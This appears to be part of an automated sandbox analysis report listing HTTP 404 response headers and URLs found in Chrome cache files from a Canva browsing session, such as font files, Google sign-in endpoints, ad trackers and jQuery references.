Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 15:02:01 GMTContent-Type: text/javascript;charset=utf-8Transfer-Encoding: chunkedConnection: closeCF-Ray: 8e59519259318cb1-EWRCF-Cache-Status: DYNAMICCache-Control: no-cache, no-storeExpires: Thu, 01 Jan 1970 00:00:00 GMTStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadPragma: No-cacheaccept-ch: Sec-CH-UA-Platform-Versioncontent-security-policy: frame-ancestors https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;referrer-policy: strict-origin-when-cross-originx-content-type-options: nosniffx-frame-options: denyx-request-id: 8e59519259318cb1x-xss-protection: 1; mode=blockReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7v5czF8MluK06c4y7Gd298vhf9OH7Netbp2I7Xi33I148BuinvAH4I0JHYu8bNJe4nKuaotOdH3T%2FXmy7AvWQG6wiI8L%2FHS%2F8SzKFZm2wn%2BGq7ZyxW1Dg7cSfNeKQmQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server: cloudflare
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 15:02:03 GMTContent-Type: text/javascript;charset=utf-8Transfer-Encoding: chunkedConnection: closeCF-Ray: 8e59519dfc66c436-EWRCF-Cache-Status: DYNAMICCache-Control: no-cache, no-storeExpires: Thu, 01 Jan 1970 00:00:00 GMTStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadVary: OriginPragma: No-cacheaccept-ch: Sec-CH-UA-Platform-Versioncontent-security-policy: frame-ancestors https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;referrer-policy: strict-origin-when-cross-originx-content-type-options: nosniffx-frame-options: denyx-request-id: 8e59519dfc66c436x-xss-protection: 1; mode=blockReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5y6TjRZppBncWp2AicMealjiY0Sn%2BJrD1xPbYbSxBd%2F4vjB91W7yJBT7xDZCH%2BPPun0uF6VikAwwRZasdl%2Fsz2Rn2R4TdW%2F066NxEz0zFeT077ue5bxfxLRTdLfaTnU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server: cloudflare
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Content-Length: 150Connection: closeDate: Wed, 20 Nov 2024 15:02:10 GMTx-powered-by: Expresscontent-security-policy: default-src 'none'x-content-type-options: nosniffx-envoy-upstream-service-time: 1Server: envoyX-Cache: Error from cloudfrontVia: 1.1 a952a9f23f3cd76250ef3c22a1c48a20.cloudfront.net (CloudFront)X-Amz-Cf-Pop: TLV50-C2X-Amz-Cf-Id: sLPfbdjNLHEVmOOUtXqjcZ0ivWHr_N1t9OwkphfBFtew-6jgZjseHA==X-XSS-Protection: 1; mode=blockStrict-Transport-Security: max-age=3600; includeSubDomains; preloadVary: Origin
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Content-Length: 144Connection: closeDate: Wed, 20 Nov 2024 15:02:16 GMTx-powered-by: Expresscontent-security-policy: default-src 'none'x-content-type-options: nosniffx-envoy-upstream-service-time: 1Server: envoyX-Cache: Error from cloudfrontVia: 1.1 5e51c2cb85f3832b4e4037f8dff6904c.cloudfront.net (CloudFront)X-Amz-Cf-Pop: TLV50-C2X-Amz-Cf-Id: DfLcfL4vr4xwEMhu5-t1tz-oiI2asKyHlje-h8yhb5DPLIjg549qsw==X-XSS-Protection: 1; mode=blockStrict-Transport-Security: max-age=3600; includeSubDomains; preloadVary: Origin
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 15:02:17 GMTContent-Type: text/javascript;charset=utf-8Transfer-Encoding: chunkedConnection: closeCF-Ray: 8e5951f658fa4295-EWRCF-Cache-Status: DYNAMICCache-Control: no-cache, no-storeExpires: Thu, 01 Jan 1970 00:00:00 GMTStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadVary: OriginPragma: No-cacheaccept-ch: Sec-CH-UA-Platform-Versioncontent-security-policy: frame-ancestors https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;referrer-policy: strict-origin-when-cross-originx-content-type-options: nosniffx-frame-options: denyx-request-id: 8e5951f658fa4295x-xss-protection: 1; mode=blockReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VBoHz5gSs3kKafuW3rcrsaZ%2FlBw5gshrfXORrpoHjUI26FsyAW1TzN5fPybrhjqeO1ZvRTVny36iGtQm8zgt7OC%2BtBkAwHA5%2BhDdoWVGudN%2BSaHo%2Bot0bgXZ8SE58Uk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server: cloudflare
Source: chromecache_224.2.dr, chromecache_149.2.drString found in binary or memory: http://codepen.io/
Source: chromecache_224.2.dr, chromecache_149.2.drString found in binary or memory: http://codesandbox.io/
Source: chromecache_217.2.dr, chromecache_193.2.drString found in binary or memory: http://jquery.org/license
Source: chromecache_257.2.dr, chromecache_202.2.drString found in binary or memory: http://opensource.org/licenses/MIT).
Source: chromecache_224.2.dr, chromecache_149.2.drString found in binary or memory: http://tally.so/
Source: chromecache_224.2.dr, chromecache_149.2.drString found in binary or memory: http://youtu.be/
Source: chromecache_169.2.drString found in binary or memory: https://accounts.google.com/gsi/
Source: chromecache_169.2.drString found in binary or memory: https://accounts.google.com/gsi/button
Source: chromecache_190.2.dr, chromecache_228.2.drString found in binary or memory: https://accounts.google.com/gsi/client
Source: chromecache_169.2.drString found in binary or memory: https://accounts.google.com/gsi/fedcm.json
Source: chromecache_169.2.drString found in binary or memory: https://accounts.google.com/gsi/fedcmcsp?client_id=
Source: chromecache_169.2.drString found in binary or memory: https://accounts.google.com/gsi/iframe/select
Source: chromecache_169.2.drString found in binary or memory: https://accounts.google.com/gsi/log
Source: chromecache_169.2.drString found in binary or memory: https://accounts.google.com/gsi/revoke
Source: chromecache_169.2.drString found in binary or memory: https://accounts.google.com/gsi/select
Source: chromecache_169.2.drString found in binary or memory: https://accounts.google.com/gsi/status
Source: chromecache_169.2.drString found in binary or memory: https://accounts.google.com/gsi/style
Source: chromecache_169.2.drString found in binary or memory: https://accounts.google.com/o/oauth2/iframe
Source: chromecache_169.2.drString found in binary or memory: https://accounts.google.com/o/oauth2/v2/auth
Source: chromecache_180.2.drString found in binary or memory: https://ad.doubleclick.net/activity;register_conversion=1;src=9812343;type=conve0;cat=canva008;ord=2
Source: chromecache_207.2.drString found in binary or memory: https://ad.doubleclick.net/activity;register_conversion=1;src=9812343;type=websi000;cat=flood0;ord=7
Source: chromecache_180.2.drString found in binary or memory: https://ad.doubleclick.net/activity;src=9812343;type=conve0;cat=canva008;ord=2037306899;gtm=45j91e4b
Source: chromecache_207.2.drString found in binary or memory: https://ad.doubleclick.net/activity;src=9812343;type=websi000;cat=flood0;ord=730010551;gtm=45j91e4bi
Source: chromecache_204.2.drString found in binary or memory: https://adservice.google.com/pagead/regclk?
Source: chromecache_155.2.dr, chromecache_251.2.drString found in binary or memory: https://api-gw.metadata.io
Source: chromecache_155.2.dr, chromecache_251.2.drString found in binary or memory: https://api.ipify.org?format=json
Source: chromecache_217.2.dr, chromecache_193.2.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=378607
Source: chromecache_217.2.dr, chromecache_193.2.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=449857
Source: chromecache_217.2.dr, chromecache_193.2.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=470258
Source: chromecache_217.2.dr, chromecache_193.2.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=589347
Source: chromecache_217.2.dr, chromecache_193.2.drString found in binary or memory: https://bugs.jquery.com/ticket/12359
Source: chromecache_217.2.dr, chromecache_193.2.drString found in binary or memory: https://bugs.jquery.com/ticket/13378
Source: chromecache_217.2.dr, chromecache_193.2.drString found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=136851
Source: chromecache_217.2.dr, chromecache_193.2.drString found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=137337
Source: chromecache_217.2.dr, chromecache_193.2.drString found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=29084
Source: chromecache_217.2.dr, chromecache_193.2.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=687787
Source: chromecache_224.2.dr, chromecache_149.2.drString found in binary or memory: https://canva-embed.com
Source: chromecache_151.2.dr, chromecache_235.2.dr, chromecache_204.2.dr, chromecache_231.2.drString found in binary or memory: https://cct.google/taggy/agent.js
Source: chromecache_224.2.dr, chromecache_149.2.drString found in binary or memory: https://cdn.iframe.ly
Source: chromecache_155.2.dr, chromecache_251.2.drString found in binary or memory: https://cdn.metadata.io/pixel/config
Source: chromecache_175.2.dr, chromecache_253.2.drString found in binary or memory: https://chunk-composing.canva.com/chunk-batch-sm/12_sourcemaps/5756a030498f80f0.js.map
Source: chromecache_185.2.dr, chromecache_276.2.drString found in binary or memory: https://chunk-composing.canva.com/chunk-batch-sm/13_sourcemaps/6adf981daf016320.js.map
Source: chromecache_205.2.dr, chromecache_187.2.drString found in binary or memory: https://chunk-composing.canva.com/chunk-batch-sm/15_sourcemaps/d2858d877c79e696.js.map
Source: chromecache_224.2.dr, chromecache_149.2.drString found in binary or memory: https://chunk-composing.canva.com/chunk-batch-sm/1724_sourcemaps/40ceb5685514c3ac.js.map
Source: chromecache_162.2.drString found in binary or memory: https://chunk-composing.canva.com/chunk-batch-sm/2_sourcemaps/0009a6e8ae11a411.ltr.css.map
Source: chromecache_233.2.drString found in binary or memory: https://chunk-composing.canva.com/chunk-batch-sm/2_sourcemaps/9791fb4bf6628247.ltr.css.map
Source: chromecache_260.2.dr, chromecache_244.2.drString found in binary or memory: https://chunk-composing.canva.com/chunk-batch-sm/85_sourcemaps/3e1e05ba24ee6f70.js.map
Source: chromecache_224.2.dr, chromecache_149.2.drString found in binary or memory: https://codepen.io/
Source: chromecache_224.2.dr, chromecache_149.2.drString found in binary or memory: https://codesandbox.io/
Source: chromecache_235.2.dr, chromecache_231.2.drString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
Source: chromecache_217.2.dr, chromecache_193.2.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/CSS/display
Source: chromecache_169.2.drString found in binary or memory: https://developers.google.com/identity/gsi/web/guides/fedcm-migration
Source: chromecache_169.2.drString found in binary or memory: https://developers.google.com/identity/gsi/web/guides/fedcm-migration?s=dc#cross_origin)
Source: chromecache_169.2.drString found in binary or memory: https://developers.google.com/identity/gsi/web/guides/fedcm-migration?s=dc#display_moment
Source: chromecache_169.2.drString found in binary or memory: https://developers.google.com/identity/gsi/web/guides/fedcm-migration?s=dc#skipped_moment
Source: chromecache_217.2.dr, chromecache_193.2.drString found in binary or memory: https://drafts.csswg.org/cssom/#common-serializing-idioms
Source: chromecache_217.2.dr, chromecache_193.2.drString found in binary or memory: https://drafts.csswg.org/cssom/#resolved-values
Source: chromecache_224.2.dr, chromecache_149.2.drString found in binary or memory: https://drive.google.com/file/
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/02.ttf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/02.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/02.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/03.ttf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/03.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/03.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/04.ttf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/04.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/04.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/05.ttf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/05.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/05.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/09.ttf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/09.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/09.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/0A.ttf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/0A.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/0A.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/0B.ttf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/0B.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/0B.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/0C.ttf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/0C.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/0C.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/11.ttf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/11.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/11.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/12.ttf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/12.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/12.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/16-quadratic.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/16.otf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/16.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/16.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/17-quadratic.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/17.otf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/17.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/17.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/23.ttf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/23.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/23.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/24.ttf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/24.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/24.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/26.ttf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/26.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/26.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/27.ttf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/27.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/27.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/28.ttf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/28.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/28.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/29.ttf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/29.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/29.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/2C.ttf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/2C.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/2C.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/2D.ttf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/2D.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/2D.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/2E.ttf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/2E.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/2E.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/2F.ttf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/2F.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/2F.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/31.ttf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/31.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/31.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/32.ttf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/32.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/32.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/38.ttf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/38.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/38.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/39.ttf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/39.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/39.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/3C.ttf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/3C.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/3C.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/3D.ttf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/3D.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/3D.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/3E.ttf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/3E.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/3E.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/3F.ttf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/3F.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/3F.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/46.ttf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/46.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/46.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/47.ttf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/47.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/47.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/4B.ttf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/4B.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/4B.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/4C.ttf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/4C.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/4C.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/55.ttf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/55.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/55.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/56.ttf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/56.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/56.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/60.ttf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/60.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/60.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/61.ttf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/61.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/61.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/6F.ttf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/6F.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/6F.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/70.ttf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/70.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/70.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/71.ttf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/71.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/71.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/72.ttf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/72.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/72.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/75.ttf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/75.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/75.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/76.ttf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/76.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/76.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/7D-quadratic.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/7D.otf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/7D.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/7D.woff2)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/7E-quadratic.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/7E.otf)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/7E.woff)
Source: chromecache_150.2.drString found in binary or memory: https://font-public.canva.com/_fb/0/7E.woff2)
Source: chromecache_243.2.drString found in binary or memory: https://fontawesome.com
Source: chromecache_243.2.drString found in binary or memory: https://fontawesome.com/license/free
Source: chromecache_227.2.drString found in binary or memory: https://fonts.gstatic.com/s/archivonarrow/v30/tss5ApVBdCYD5Q7hcxTE1ArZ0Zz8oY2KRmwvKhhvLFG6o3ms.woff2
Source: chromecache_227.2.drString found in binary or memory: https://fonts.gstatic.com/s/archivonarrow/v30/tss5ApVBdCYD5Q7hcxTE1ArZ0Zz8oY2KRmwvKhhvLFG6rHmsJCQ.wo
Source: chromecache_227.2.drString found in binary or memory: https://fonts.gstatic.com/s/archivonarrow/v30/tss5ApVBdCYD5Q7hcxTE1ArZ0Zz8oY2KRmwvKhhvLFG6rXmsJCQ.wo
Source: chromecache_222.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4gaVI
Source: chromecache_222.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4iaVI
Source: chromecache_222.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4jaVI
Source: chromecache_222.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4kaVI
Source: chromecache_222.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4saVI
Source: chromecache_222.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4taVI
Source: chromecache_222.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4uaVI
Source: chromecache_222.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4vaVI
Source: chromecache_222.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x5OaVI
Source: chromecache_222.2.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x5caVI
Source: chromecache_272.2.dr, chromecache_216.2.dr, chromecache_258.2.drString found in binary or memory: https://getbootstrap.com)
Source: chromecache_217.2.dr, chromecache_193.2.drString found in binary or memory: https://github.com/eslint/eslint/issues/3229
Source: chromecache_217.2.dr, chromecache_193.2.drString found in binary or memory: https://github.com/eslint/eslint/issues/6125
Source: chromecache_252.2.dr, chromecache_168.2.drString found in binary or memory: https://github.com/getsentry/sentry-javascript
Source: chromecache_217.2.dr, chromecache_193.2.drString found in binary or memory: https://github.com/jquery/jquery/pull/557)
Source: chromecache_217.2.dr, chromecache_193.2.drString found in binary or memory: https://github.com/jquery/sizzle/pull/225
Source: chromecache_217.2.dr, chromecache_193.2.drString found in binary or memory: https://github.com/jrburke/requirejs/wiki/Updating-existing-libraries#wiki-anon
Source: chromecache_272.2.dr, chromecache_216.2.dr, chromecache_258.2.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
Source: chromecache_272.2.dr, chromecache_258.2.drString found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
Source: chromecache_175.2.dr, chromecache_253.2.drString found in binary or memory: https://hm.baidu.com
Source: chromecache_217.2.dr, chromecache_193.2.drString found in binary or memory: https://html.spec.whatwg.org/#strip-and-collapse-whitespace
Source: chromecache_217.2.dr, chromecache_193.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#category-listed
Source: chromecache_217.2.dr, chromecache_193.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#concept-fe-disabled
Source: chromecache_217.2.dr, chromecache_193.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#concept-option-disabled
Source: chromecache_217.2.dr, chromecache_193.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/scripting.html#selector-disabled
Source: chromecache_217.2.dr, chromecache_193.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/scripting.html#selector-enabled
Source: chromecache_217.2.dr, chromecache_193.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#attributes-2
Source: chromecache_217.2.dr, chromecache_193.2.drString found in binary or memory: https://infra.spec.whatwg.org/#strip-and-collapse-ascii-whitespace
Source: chromecache_217.2.dr, chromecache_193.2.drString found in binary or memory: https://jquery.com/
Source: chromecache_217.2.dr, chromecache_193.2.drString found in binary or memory: https://jquery.org/license
Source: chromecache_217.2.dr, chromecache_193.2.drString found in binary or memory: https://jsperf.com/getall-vs-sizzle/2
Source: chromecache_217.2.dr, chromecache_193.2.drString found in binary or memory: https://jsperf.com/thor-indexof-vs-for/5
